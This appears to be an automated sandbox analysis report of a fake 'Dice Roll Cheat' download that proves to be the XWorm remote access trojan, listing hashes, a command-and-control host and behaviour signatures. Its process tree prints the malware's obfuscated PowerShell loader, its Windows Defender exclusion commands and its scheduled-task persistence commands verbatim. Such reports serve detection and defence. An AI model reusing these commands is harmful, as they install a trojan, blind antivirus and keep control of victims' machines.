Overview

overview

10

Static

static

10

Dice roll ...er.dll

windows10-1703-x64

1

Dice roll ...V2.exe

windows10-1703-x64

10

Dice roll ...eat.py

windows10-1703-x64

3

Dice roll ...ox.dll

windows10-1703-x64

1

Dice roll ...I2.dll

windows10-1703-x64

1

Dice roll ...ns.dll

windows10-1703-x64

1

Dice roll ...ng.dll

windows10-1703-x64

1

Dice roll ...ns.dll

windows10-1703-x64

1

Dice roll ...Ex.exe

windows10-1703-x64

1

Dice roll ...nt.dll

windows10-1703-x64

1

Analysis

  • max time kernel
    70s
  • max time network
    71s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    14-09-2024 16:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Dice roll advanced cheat/Dice roll advanced cheat/Dice roll advanced cheat/Dice Roll CheatV2.exe

  • Size

    23.3MB

  • MD5

    99197c50cf777691f85ff76130c29186

  • SHA1

    885a312fee977b740c1100e2091444695da7d58d

  • SHA256

    e63b97535e194d90756cc01a322550d4fa41a76117799a798ea0a78c6dd940bd

  • SHA512

    cbfd7080ddc2fd6094d0882da1e9e94c439b9fba6cf7935e45410979c24ebbab372f02e4665b226f829d1a2300965d1278957a2f24d997969f8db37e8091522f

  • SSDEEP

    393216:9XlObdJ4zYDHwWk5FqBJF/hGn7RcPR5jHnxtSKzfZgvTbbBUcfs7GOa:1lIIYDdKFqBFGuPHTxcKzfATbbBf

Score
10/10
xwormdefense_evasionevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

distribution-between.gl.at.ply.gg:39183

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Helper.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Disables Task Manager via registry modification
    evasion
  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Dice roll advanced cheat\Dice roll advanced cheat\Dice roll advanced cheat\Dice Roll CheatV2.exe
    "C:\Users\Admin\AppData\Local\Temp\Dice roll advanced cheat\Dice roll advanced cheat\Dice roll advanced cheat\Dice Roll CheatV2.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "Dice Roll CheatV1.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5104
      • C:\Windows\system32\net.exe
        net file
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:208
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 file
          4⤵
            PID:4776
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fYmmJNEEmwL2/i91dLAq9U/rqmkeJ1ZMYsKyNxwXrUQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ujlgrPMnGs/JAXhlzyavNw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oxTJr=New-Object System.IO.MemoryStream(,$param_var); $ZOGRX=New-Object System.IO.MemoryStream; $suIjM=New-Object System.IO.Compression.GZipStream($oxTJr, [IO.Compression.CompressionMode]::Decompress); $suIjM.CopyTo($ZOGRX); $suIjM.Dispose(); $oxTJr.Dispose(); $ZOGRX.Dispose(); $ZOGRX.ToArray();}function execute_function($param_var,$param2_var){ $OpBwG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cBpLo=$OpBwG.EntryPoint; $cBpLo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat';$YvnNY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat').Split([Environment]::NewLine);foreach ($BpHmp in $YvnNY) { if ($BpHmp.StartsWith(':: ')) { $BYdRI=$BpHmp.Substring(3); break; }}$payloads_var=[string[]]$BYdRI.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_75_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_75.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1780
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_75.vbs"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_75.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3316
              • C:\Windows\system32\net.exe
                net file
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2296
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 file
                  7⤵
                    PID:3944
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fYmmJNEEmwL2/i91dLAq9U/rqmkeJ1ZMYsKyNxwXrUQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ujlgrPMnGs/JAXhlzyavNw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $oxTJr=New-Object System.IO.MemoryStream(,$param_var); $ZOGRX=New-Object System.IO.MemoryStream; $suIjM=New-Object System.IO.Compression.GZipStream($oxTJr, [IO.Compression.CompressionMode]::Decompress); $suIjM.CopyTo($ZOGRX); $suIjM.Dispose(); $oxTJr.Dispose(); $ZOGRX.Dispose(); $ZOGRX.ToArray();}function execute_function($param_var,$param2_var){ $OpBwG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $cBpLo=$OpBwG.EntryPoint; $cBpLo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_75.bat';$YvnNY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_75.bat').Split([Environment]::NewLine);foreach ($BpHmp in $YvnNY) { if ($BpHmp.StartsWith(':: ')) { $BYdRI=$BpHmp.Substring(3); break; }}$payloads_var=[string[]]$BYdRI.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:692
                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe
                    "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1760
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4740
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4356
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Runtime broker.exe'
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4180
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Runtime broker" /tr "C:\ProgramData\Runtime broker.exe"
                      8⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2472
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdwB6ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAZgBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYgBuAG0AIwA+AA=="
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3700
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAagB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAeQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBxACMAPgA="
                      8⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\Runtime.exe
                      "C:\Users\Admin\AppData\Local\Temp\Runtime.exe"
                      8⤵
                      • Drops startup file
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:4152
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Runtime.exe'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4556
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime.exe'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:360
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3956
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1624
                      • C:\Windows\System32\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
                        9⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5072

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        8592ba100a78835a6b94d5949e13dfc1

        SHA1

        63e901200ab9a57c7dd4c078d7f75dcd3b357020

        SHA256

        fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

        SHA512

        87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        2acf991078394ddfd688acc9f6d0f39f

        SHA1

        5e2122efbe1938c9c1102778b4b1050cf0ac9a08

        SHA256

        dd812dddb2fa694ba7017e7ecfdd0853c80704042ff0946b17b76624763431d6

        SHA512

        9a7fe93f103b47f95bba9da099450f3962fbc8c011ee9e36dae21a56d64ee1d4e0f3afa6dfd7ad8a73897eeb33c428ce2fa0f1e633ac2c4d67de2b93e3e8031d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        aaf973052bba12318f887f5462c325f0

        SHA1

        555b53001a0bd549706ec8b20d355ea533ec35f8

        SHA256

        b764acf80de7c7e7302ea96f16d5bd7c2edc85fe26cdb4d36d887105f40dfec4

        SHA512

        f8b500d92c4aa5f5212b4324c4993dc8e6f3beb3be353122213bcf18a71a645a532526227a86c7ee0f4c69024756a3cf3533c5395da3b796e2638b522ee37c8b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        789B

        MD5

        53d1bdb9ec3bf59046207c75e7ee192f

        SHA1

        5a6474ab8384dd92f002a92483ad20b60281709e

        SHA256

        4dbb8d29bcd6d4323c60616d44d2c41ba4d3c47fb63c0b2912f9bb12acc95107

        SHA512

        ac096b1f248436404abcc1f7c7b6c3af37d6fd3174ee5952bb28f79ad2f889c6c90ca78a371d38f91c388a3694525054cbab3511841af00a49e4264df7e7bf4e

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        69b9917c0ffb2c2b2dcf8a5e262c44b2

        SHA1

        e486bcf57396e6eba907e1a0da3f6adc32bc01df

        SHA256

        39734ca964c07fe6a47c27959650e4478ac60acad7e0a216e1ab6d5fefb78da4

        SHA512

        06752fd2b346632f7aab310b0518882c60439580048d5a0ef6f14ff9771361e29430b4ec73c0cdece07092a03cfb82f21f366a8a2f4544ec569c535c62986e01

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d464a6664c86732f1614f8a7cdd337cb

        SHA1

        7b28b1ca4850a0cf0300e335f1a39eea8796b20e

        SHA256

        cd8c9418039078f998c68608af26b836badd2a960e8e4311245eca2d95e7a50e

        SHA512

        25376129fa354a079e3b66c5594ee3e7b07ec50e202820a2363cb16860589a2b614e75a82edfcc72e1c8af4e5dd71c44755a90589d80ecca59a9c1379109fec7

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        2c3970e4b0d575d8bf7d6db28b5ffb96

        SHA1

        7cc728b6e55f0489ef427cb503c24f4a05927b38

        SHA256

        b06bff4a9a304a3b99373801a4f5deeae99f1e761cab8b05848fe0d2cdfcd50c

        SHA512

        eaf4fc0686e16635b2ab2c82677c6c1486be16e5d59385d8c26b3abf198e8a6306a3e72d07bcfb8ba7df3d609399558f0f3b2040191d3f45f6e900f407978e74

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        511658d8b7ca56963f73c3be004a38d4

        SHA1

        8c574c3bbaf196167a5a76117832c42cf39caeb6

        SHA256

        a36a4584a4443f19bda8a886aed7a38af9e34b9098d69661177e774c9536a4fd

        SHA512

        b8caabbb7f24d9415a01f68f9394debaae21245c41ab51b70b56f071373f0dd6d9e1da11dbf38f4a8b36fe8ce6f3f2ac3128e785b2333cfadd6fc9f7f15d26dd

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        493feaa6e39a03e520e2ca446e12d87e

        SHA1

        ce8d6271c8b869f056ce8b41f991796fdc5831ed

        SHA256

        1a47c88ff31191b553aa735761cf9f6e2cdaea3ef44716210db4b786e5fd9dcf

        SHA512

        5b3f26460304eec41ae2ba37857e74793e505a4f4f2671c80acd483d37f53b9166601f16efeb2104df479522d7c64f6f580a35dcd295fac83583c9fae62f8e31

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        ffd1078057378e2c8b058571795dafc8

        SHA1

        0bca40bf286cd9dc9e1ced7290407e6881673200

        SHA256

        2260f4a788a4ea4cab4df510b94e327d54ac0131cfd86547b5ef8db09707cf76

        SHA512

        97e03f35bfc03ca041c7cc42fddc7ee728acf1a28987f5f779e5f295313a631639ff48cb5bfe580f6b570d34a4356f65bd9365220a4d070a1242ba58a6868384

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        70eb0b5bb3cf49a1a96f1ceb2b6231fb

        SHA1

        d090a3753d41b71386e40ec46a5456aab98ad984

        SHA256

        a4c6bd801743011953d9c44a0c15ee014f9813320945e3704da5f871454a81af

        SHA512

        e121c4810db73d164f46f7cd2e38d95ae57db8799df73834a1ba31274afdee0a3eba15270268ed766bddb76aa5467c11429c795ee993924fc1846338be80edc3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dice Roll CheatV1.bat
        Filesize

        30.7MB

        MD5

        9fbbc89299dc7622d1524f2e7930dc60

        SHA1

        ceabc64269c5ed939b4261229eb416e28d4b4cdc

        SHA256

        ce76a288ef34447b2ae99d1e56cb2ad2fd3795fe3651fbd24e865d98fb59bec0

        SHA512

        ddff2feaac4f482c2dfa4b2d73b7630a266de2ffaa9f1de1c36003739a7179bd5d3140dc7b741d03b17bc8c43765ca4c821e76b9ab512e99461fb237a40fd9e9

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Runtime broker.exe
        Filesize

        108KB

        MD5

        a8866dcd94ddb4984457c1bf9f87eab6

        SHA1

        698a8100e303a49ff9c2d5be9b0adc34bc93b764

        SHA256

        190db2f6a8324d2b2392be6215261f73e77c3f4ef21fcc7aa80595650851ae3e

        SHA512

        5844f5202eb5ed31c6cd7201036dedd6255c38b524a375fce106bc57f7ddb9fa23c305aec06969e12aa90cfca33391bd35dcf343655c1255a17e17129c1f6c62

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Runtime.exe
        Filesize

        77KB

        MD5

        70f947112e2a87e3f3b71d47a00c5bd2

        SHA1

        de11030afe7e644fe172cba666f5054c68f3975b

        SHA256

        cc284c5da70bd76ab83dc1202239a033dbba134b950ba74648463e955509f1da

        SHA512

        6e6a310c3d2b5fdc47b2b8f7a5a1c9dfb0647bc6ff657298435983fdceda566eb9b69dded4ac9b1c363a3f54519f84afea6d172abbf40edae5fa9864f1b89090

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vb5w3a2z.xql.ps1
        Filesize

        1B

        MD5

        c4ca4238a0b923820dcc509a6f75849b

        SHA1

        356a192b7913b04c54574d18c28d46e6395428ab

        SHA256

        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

        SHA512

        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_75.vbs
        Filesize

        114B

        MD5

        34e69de0a685a97c26fb97de1fc2cc8a

        SHA1

        ba2eb0e7078fe87022adfe3bd0ac3ca153a3ca9f

        SHA256

        4158af40bdbc3b62eb85e6f5c69cb7bfa87bc74b18855d50a1565a76074b827d

        SHA512

        320abfb0384f646b67840a15c6ddf5eff6a368683826b3a509ec70ec3778f162f90d13667312824a5782318bfd67f54f9913324da5380fa91ae2f4c2da701054

        Download Submit

      • memory/692-130-0x000001E3B0000000-0x000001E3B1000000-memory.dmp

        Filesize

        16.0MB

        Download

      • memory/1760-262-0x000000001B6D0000-0x000000001B6EC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/1760-129-0x0000000000670000-0x0000000000692000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4152-272-0x0000000000620000-0x000000000063A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4152-523-0x000000001C160000-0x000000001C16C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/4800-34-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-112-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-33-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-31-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4800-32-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-35-0x000001C8A0760000-0x000001C8A0768000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4800-30-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-15-0x000001C8EDB10000-0x000001C8EDB86000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4800-10-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-9-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/4800-8-0x000001C8ED960000-0x000001C8ED982000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4800-3-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4800-36-0x000001C898000000-0x000001C899704000-memory.dmp

        Filesize

        23.0MB

        Download